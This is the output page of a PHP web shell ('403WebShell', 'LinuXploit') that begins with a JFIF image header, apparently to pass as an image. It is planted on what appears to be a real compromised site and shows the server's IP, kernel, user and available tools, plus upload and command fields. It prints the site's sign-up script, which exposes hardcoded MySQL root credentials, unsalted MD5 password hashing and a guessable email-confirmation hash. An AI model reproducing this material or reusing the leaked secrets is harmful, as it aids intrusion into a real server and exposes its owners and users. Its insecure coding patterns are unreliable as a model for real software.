????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 216.73.216.36
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/www.notes-online.se/scripts/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/www.notes-online.se/scripts/addclient_fromipad_evac.php
<?php

function copy_r($source, $dest)
{
    // Check for symlinks
    if (is_link($source)) {
        return symlink(readlink($source), $dest);
    }
     
    // Simple copy for a file
    if (is_file($source)) {
        return copy($source, $dest);
    }
 
    // Make destination directory
    if (!is_dir($dest)) {
        mkdir($dest);
    }
 
    // Loop through the folder
    $dir = dir($source);
    while (false !== $entry = $dir->read()) {
        // Skip pointers
        if ($entry == '.' || $entry == '..') {
            continue;
        }
 
        // Deep copy directories
        copy_r("$source/$entry", "$dest/$entry");
    }
 
    // Clean up
    $dir->close();
    return true;
}

$company = $_POST['company'];
$name = $_POST['name'];
$username = $_POST['emailid'];
$password = $_POST['password'];
$address = $_POST['address'];
$postalCode = $_POST['postalCode'];
$city = $_POST['city'];
$country = $_POST['country'];
$app = $_POST['app'];

if($app == ""){
	$app = "Utrym";
}

$company = mysql_real_escape_string(stripslashes($company));
$name = mysql_real_escape_string(stripslashes($name));
$username = mysql_real_escape_string(stripslashes($username));
$password = md5(mysql_real_escape_string(stripslashes($password)));
$address = mysql_real_escape_string(stripslashes($address));
$postalCode = mysql_real_escape_string(stripslashes($postalCode));
$city = mysql_real_escape_string(stripslashes($city));
$country = mysql_real_escape_string(stripslashes($country));
$app = mysql_real_escape_string(stripslashes($app));

$link = mysql_connect ("localhost", "root", "root123");
mysql_select_db ("notes");

$sql = "insert into tblCompany values(NULL,'$company','$address','$postalCode','$city','$country','',0)";
mysql_query($sql);
$CompanyId = mysql_insert_id();

$lastLogin = date("Y-m-d H:i:s");


// check if username and password exists, if so, dont add user, only send confirmation mail
$sql = "select * from tblUsers where username = '".$username."' and password = '".$password."'";
$UserId = "0";
$add = true;
$result = mysql_query($sql);
while ($row = mysql_fetch_assoc($result)){ 
	$UserId = $row['userId'];
	$add = false;
}

if($add == true){
	$sql = "insert into tblUsers values(NULL,'$name','$username','$password',1,$CompanyId,0,1,'$lastLogin',0,'','$app',0)";
	mysql_query($sql);
	$UserId = mysql_insert_id();	

	$registrationDate = date("Y-m-d");
	$sql = "insert into tblAccounts values(NULL,'$CompanyId','$UserId','$registrationDate',0)";
	mysql_query($sql);
	
	$sql = "insert into tblAccountsData values(NULL,1,1,1,1,1,1,1,$CompanyId)";
	mysql_query($sql);
	
		$sql = "insert into tblSymbolGroupsJoinCompany values(NULL,$CompanyId,9)";
	mysql_query($sql);		
	
	
}


$headers  = 'MIME-Version: 1.0' . "\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n"; 
$headers .= "From: noreply@astacus.se\r\n";

mail($username, "Evacuation Plans - Welcome!", "Dear Evacuation Plan user. <br>Thank you for downloading Evacuation Plans.<br><br>Before you can login you need to confirm your e-mail address (".$username."). Click on the link below to confirm your address: <br><br><a href='http://www.notes-online.se/?action=confirm&refid=".$UserId."&hash=".md5($username."password")."&goto=utrym'>I hereby confirm that my email is correct!</a><br><br>Best Regards, Evacuation Plans Team", $headers);	


mail("carl.hoffstedt@astacus.se", "Evacuation Plans - Welcome!", "Dear Evacuation Plan user. <br>Thank you for downloading Evacuation Plans.<br><br>Before you can login you need to confirm your e-mail address (".$username."). Click on the link below to confirm your address: <br><br><a href='http://www.notes-online.se/?action=confirm&refid=".$UserId."&hash=".md5($username."password")."&goto=utrym'>I hereby confirm that my email is correct!</a><br><br>Best Regards, Evacuation Plans Team", $headers);	
		

if($add == true){
	$from = "/var/www/notes_files/templates_evac/";
	$to = "/var/www/notes_files/$CompanyId/";
	mkdir($to);
	copy_r($from,$to);

}
	
if($_GET['from'] == "browser"){
	header("Location: http://www.evacuationplans.se/loggain.php?msg=Thank you, you will shortly receive an message where you need to confirm your e-mail.");
}else{
	
	
	echo("True");
}

?>

Youez - 2016 - github.com/yon3zu
LinuXploit